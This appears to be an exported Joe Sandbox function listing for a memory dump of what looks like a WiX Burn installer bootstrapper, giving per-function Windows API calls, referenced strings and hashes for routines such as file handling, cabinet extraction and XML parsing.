Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: 4e372ab7efda12ee311e3e16dd05ff8951e5bf68a820546c69a47c776ba84355
Instruction ID: 8704b49db4fc74ce206c0888d02e4dc2a5c09930b7e4adab79bea7c62af9f3f8
Opcode Fuzzy Hash: 4e372ab7efda12ee311e3e16dd05ff8951e5bf68a820546c69a47c776ba84355
Instruction Fuzzy Hash: 02119632951229FBCB119FA98C05E9E7B6CAF45B34F158256F920F72D0D7709D0097D0

Function 009D32F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009D3309
SysAllocString.OLEAUT32(?), ref: 009D3325
VariantClear.OLEAUT32(?), ref: 009D33AC
SysFreeString.OLEAUT32(00000000), ref: 009D33B7

Strings

`5w, xrefs: 009D33B7
xmlutil.cpp, xrefs: 009D333C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `5w$xmlutil.cpp
API String ID: 760788290-26783885
Opcode ID: f0bae1401f01c0cd6e7188ecfa1b07acc8758a2040c59c4345ba4a53eb8068b6
Instruction ID: 37f33d803ce98310d7573d33feb0117afd7e01b1795cab1c413b87fa376ee317
Opcode Fuzzy Hash: f0bae1401f01c0cd6e7188ecfa1b07acc8758a2040c59c4345ba4a53eb8068b6
Instruction Fuzzy Hash: A921B131941219EFCB20DF98C948FAEFBB9AF84712F55C159F901AB320CB319E009B91

Function 009D0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,009953BD,00000000,?,?,?,?,?,?,?,009A769D,00000000), ref: 009D0897
GetLastError.KERNEL32(?,?,?,?,?,?,?,009A769D,00000000), ref: 009D08A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,009A769D,00000000), ref: 009D08D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,009A769D,00000000), ref: 009D08EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,009A769D,00000000), ref: 009D092B

Strings

procutil.cpp, xrefs: 009D0919

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: 793f168a30df6e5f38960d92ef97d8cd16e0da5f0de39e045e9fb485bd864df9
Instruction ID: 60e62ab4ab5dc1f418e18dd298f912142c286f2e29660e6d19d6441b5e029986
Opcode Fuzzy Hash: 793f168a30df6e5f38960d92ef97d8cd16e0da5f0de39e045e9fb485bd864df9
Instruction Fuzzy Hash: 6D219232D81229EBDB219F95C805B9EBBACEF94710F128157AD14AB350D3708E40EAD0

Function 009A6B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 009A6B49
CloseHandle.KERNEL32(00000000), ref: 009A6BB9

Strings

%ls -%ls=%u, xrefs: 009A6B61, 009A6B93
Failed to append the file handle to the obfuscated command line., xrefs: 009A6BA7
burn.filehandle.self, xrefs: 009A6B5A, 009A6B8C
Failed to append the file handle to the command line., xrefs: 009A6B75

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: a541a456b5d34b20f54c0093eb32ccb6f2c71d82aac15817e02667f1e684f168
Instruction ID: de02b25644b4d3621cd0e6163be2f66028431b681731431d2d569ad9dfca622c
Opcode Fuzzy Hash: a541a456b5d34b20f54c0093eb32ccb6f2c71d82aac15817e02667f1e684f168
Instruction Fuzzy Hash: 7811E632645614BBCB215A68CC05F9B77ACDBC6B38F064351FD24EB2E1D370481196E1

Function 009D3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009D3574
InterlockedIncrement.KERNEL32(009FB6C8), ref: 009D3591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,009FB6B8,?,?,?,?,?,?), ref: 009D35AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,009FB6B8,?,?,?,?,?,?), ref: 009D35B8

Strings

MSXML.DOMDocument, xrefs: 009D35B3
Msxml2.DOMDocument, xrefs: 009D35A7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 94a8ec0a5c82f43a9bc4eaeec7c4c9ebd66c14432aa0c73bd28ad2fc11c9e828
Instruction ID: 18d189ba6e20354f38c854bc6d9e09aaade293761b67de6319ad660939c9127e
Opcode Fuzzy Hash: 94a8ec0a5c82f43a9bc4eaeec7c4c9ebd66c14432aa0c73bd28ad2fc11c9e828
Instruction Fuzzy Hash: D8F0A7217C522997C7201F62BD08B262E69A780F6AF05851BF904C2254D360C54197B2

Function 009D4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 009D4A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 009D4ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 009D4AF6
GetLastError.KERNEL32(00000000,009DB7A0,?,00000000,?,00000000,?,00000000), ref: 009D4B34
GlobalFree.KERNEL32(00000000), ref: 009D4B65

Strings

fileutil.cpp, xrefs: 009D4AB8, 009D4B11

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: ed109ec3d7e87f5951b6855d54bbc85b70813b682e5a3ec3de453f3cf898f9a8
Instruction ID: 63f483a6c26fea9eddfde6a4f9de8cf7f3dcf2bb53a6dd44e86a426e737adcb8
Opcode Fuzzy Hash: ed109ec3d7e87f5951b6855d54bbc85b70813b682e5a3ec3de453f3cf898f9a8
Instruction Fuzzy Hash: DE317336EC4229ABCB119A998C41FAFBAB8AF94750F118167FD14EB341D634DD0096D4

Function 009B0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 009B0B27
GetLastError.KERNEL32(?,?,?), ref: 009B0B31

Strings

cabextract.cpp, xrefs: 009B0B55
Failed to move file pointer 0x%x bytes., xrefs: 009B0B62
Invalid seek type., xrefs: 009B0ABD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: e38a2397236a158d366f744def38d25769ea647684dd348011f6e0a338f9b428
Instruction ID: 691222909b01ec70f5863d0211708e54da38a321016403128314657b0025cc42
Opcode Fuzzy Hash: e38a2397236a158d366f744def38d25769ea647684dd348011f6e0a338f9b428
Instruction Fuzzy Hash: 5731A331A4022AEFCB11CF98CD45EAEB769FB84734B148519F91497251D334ED108B90

Function 00994115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,009AA0E8,00000000,00000000,?,00000000,009953BD,00000000,?,?,0099D5B5,?), ref: 00994123
GetLastError.KERNEL32(?,009AA0E8,00000000,00000000,?,00000000,009953BD,00000000,?,?,0099D5B5,?,00000000,00000000), ref: 00994131
CreateDirectoryW.KERNEL32(?,840F01E8,00995489,?,009AA0E8,00000000,00000000,?,00000000,009953BD,00000000,?,?,0099D5B5,?,00000000), ref: 0099419A
GetLastError.KERNEL32(?,009AA0E8,00000000,00000000,?,00000000,009953BD,00000000,?,?,0099D5B5,?,00000000,00000000), ref: 009941A4

Strings

dirutil.cpp, xrefs: 009941D4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 0fc03d1a792332314a013a4c91a657ad7f98e6d492a728954adf32e483548a7b
Instruction ID: 8290eb938157fbabf804359f9243896550c4b048bcace4929d1c3bafb6c53a0b
Opcode Fuzzy Hash: 0fc03d1a792332314a013a4c91a657ad7f98e6d492a728954adf32e483548a7b
Instruction Fuzzy Hash: 8B11D22664C33597DF331AAD8C45F3BA658EF75B61F124022FD04EA240E3648CC292D1

Function 009956A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00996595,00996595,?,0099563D,?,?,00000000), ref: 009956E5
GetLastError.KERNEL32(?,0099563D,?,?,00000000,?,?,00996595,?,00997F02,?,?,?,?,?), ref: 00995714

Strings

version.dll, xrefs: 009956D7
Failed to compare strings., xrefs: 00995742
variable.cpp, xrefs: 00995738

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: c76dc60bd03ef338199ca253d586a6d93edcad407fdb426d1860af1d4cc457e5
Instruction ID: a1c7898353c0a3e297579d2336318ef2358d62fb5870b9796355fc35d4dae345
Opcode Fuzzy Hash: c76dc60bd03ef338199ca253d586a6d93edcad407fdb426d1860af1d4cc457e5
Instruction Fuzzy Hash: D7210736655925EBCF118FDCCD45A5AB7A8EB45770B220319E924EB390E630DF018790

Function 009D0A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00994F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 009D0A38
GetLastError.KERNEL32(?,?,00994F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 009D0A46
GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 009D0A8B
GetLastError.KERNEL32(?,?,00994F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 009D0A95

Strings

procutil.cpp, xrefs: 009D0A6A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: 05edf806280cc279d187a76914498d5bc870d8f8836afc5b3574e73840e71773
Instruction ID: 178373f689b4495685c7efd097f379950c23ced5f34dc914bd29faef827b3516
Opcode Fuzzy Hash: 05edf806280cc279d187a76914498d5bc870d8f8836afc5b3574e73840e71773
Instruction Fuzzy Hash: 6711A537D95736E7CB208B95890DB9E7BA8EF44B60F12C257FE54AB380D2348D4096D4

Function 009B09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009B140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,009B0A19,?,?,?), ref: 009B1434
Part of subcall function 009B140C: GetLastError.KERNEL32(?,009B0A19,?,?,?), ref: 009B143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 009B0A27
GetLastError.KERNEL32 ref: 009B0A31

Strings

cabextract.cpp, xrefs: 009B0A55
Failed to read during cabinet extraction., xrefs: 009B0A5F

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 88944f7df0a090f41312c5d3f68d7fffbff2c8dbca43148f4dec6bd3c3743443
Instruction ID: 9943383a4ee6375e697cf506baa44db1b2ad623b4c28f7523ef53b7385d7bc8c
Opcode Fuzzy Hash: 88944f7df0a090f41312c5d3f68d7fffbff2c8dbca43148f4dec6bd3c3743443
Instruction Fuzzy Hash: CF11CE36A41269FBCB219F95DD08E9F7B68FB88B70B014559FE14A7250C730AD10D6D0

Function 009B140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,009B0A19,?,?,?), ref: 009B1434
GetLastError.KERNEL32(?,009B0A19,?,?,?), ref: 009B143E

Strings

cabextract.cpp, xrefs: 009B1462
Failed to move to virtual file pointer., xrefs: 009B146C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 4afb4c50c0bf0fd8d234903213d28996680424f2569e7f732c425e26ce437018
Instruction ID: 7bbbb2a7082234d5de2178d9743e743428cb35c3848cea7ab2c8055779f7168f
Opcode Fuzzy Hash: 4afb4c50c0bf0fd8d234903213d28996680424f2569e7f732c425e26ce437018
Instruction Fuzzy Hash: B901A737541635B7CB215A968D04ACBBF19EF407B0711812AFD2856161D7359C10D6D0

Function 009D3EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 009D3F73
GetLastError.KERNEL32 ref: 009D3FD6

Strings

fileutil.cpp, xrefs: 009D3FFA

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: cef162237122fccb9749b3ae9282082468d68b2315b09b7d91c52624a57a532f
Instruction ID: 2797823fe11ab8c332b11b61d5cbdd13dbabe996aeed8cce465eb5877bf5e7c3
Opcode Fuzzy Hash: cef162237122fccb9749b3ae9282082468d68b2315b09b7d91c52624a57a532f
Instruction Fuzzy Hash: 79314F71E4026D9BEB218F59C9407DA77B8EB44752F00C0A7EA48E7340D7B49EC49A95

Function 009D4E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,009D3F9A,?,?,?), ref: 009D4E5E
GetLastError.KERNEL32(?,?,009D3F9A,?,?,?), ref: 009D4E68

Strings

fileutil.cpp, xrefs: 009D4E91

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: eb92c072687c19bd57a8f43bc19a79dd507d94c86a7fe762111758d58a53dd58
Instruction ID: 13d5c0b0af4575c601ab77831b9fe32c932d71dc4338e028059da9f3768f1ac3
Opcode Fuzzy Hash: eb92c072687c19bd57a8f43bc19a79dd507d94c86a7fe762111758d58a53dd58
Instruction Fuzzy Hash: D0F06D33A81229BBCB208E9ADC45AEFBB6DFB84761F014116FD04D7240D730AE0096F0

Function 009D490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,009A8770,00000000,00000000,00000000,00000000,00000000), ref: 009D4925
GetLastError.KERNEL32(?,?,?,009A8770,00000000,00000000,00000000,00000000,00000000), ref: 009D492F

Strings

fileutil.cpp, xrefs: 009D4953

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: 9671f23503512e323f2227fdf390bd846053c56c6eca900acecec2e2cb5f0221
Instruction ID: efa170a9d88e541dfcf2d5597b16f8f25fc12fe979ab65dc920acb3e08d821d5
Opcode Fuzzy Hash: 9671f23503512e323f2227fdf390bd846053c56c6eca900acecec2e2cb5f0221
Instruction Fuzzy Hash: F3F0A97668512DEB9B108F86DD05AAB7FA8EF04B60F018156BD5497310E731DC10D7E0

Function 00993838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00993877
GetLastError.KERNEL32 ref: 00993881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 009938EA

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 0373818f93d70fcff119320a045c52c4b938f84571d93d23acf5a66fe8a7ca1f
Instruction ID: 76bb55a044003ff36b20cab46ebcb7a44d73bc365151a41797d7b469ffd45fba
Opcode Fuzzy Hash: 0373818f93d70fcff119320a045c52c4b938f84571d93d23acf5a66fe8a7ca1f
Instruction Fuzzy Hash: 0E21F5B2D0123DB7DF209F699C49F9A77AC9B44720F1141A5FE14E7241DA70DE4087D0

Function 00993A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00993BB6,00000000,?,00991474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009913B8), ref: 00993A20
RtlFreeHeap.NTDLL(00000000,?,00993BB6,00000000,?,00991474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009913B8,000001C7,00000100), ref: 00993A27
GetLastError.KERNEL32(?,00993BB6,00000000,?,00991474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009913B8,000001C7,00000100,?), ref: 00993A31

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 27ab7e3b04ce61b2b5cdd055989da5050b546d3f5b1ea537151602cd41d9e488
Instruction ID: fdc23aa65389a8eaf72883043648651c32ce22b584629016f09a16fdb49372e2
Opcode Fuzzy Hash: 27ab7e3b04ce61b2b5cdd055989da5050b546d3f5b1ea537151602cd41d9e488
Instruction Fuzzy Hash: 29D0C233A4A1399B87201BEA9C0C95B7F9CEF08BE17024022FE44D6220D721CC40A2E0

Function 009D0F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

Strings

regutil.cpp, xrefs: 009D0FC3

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
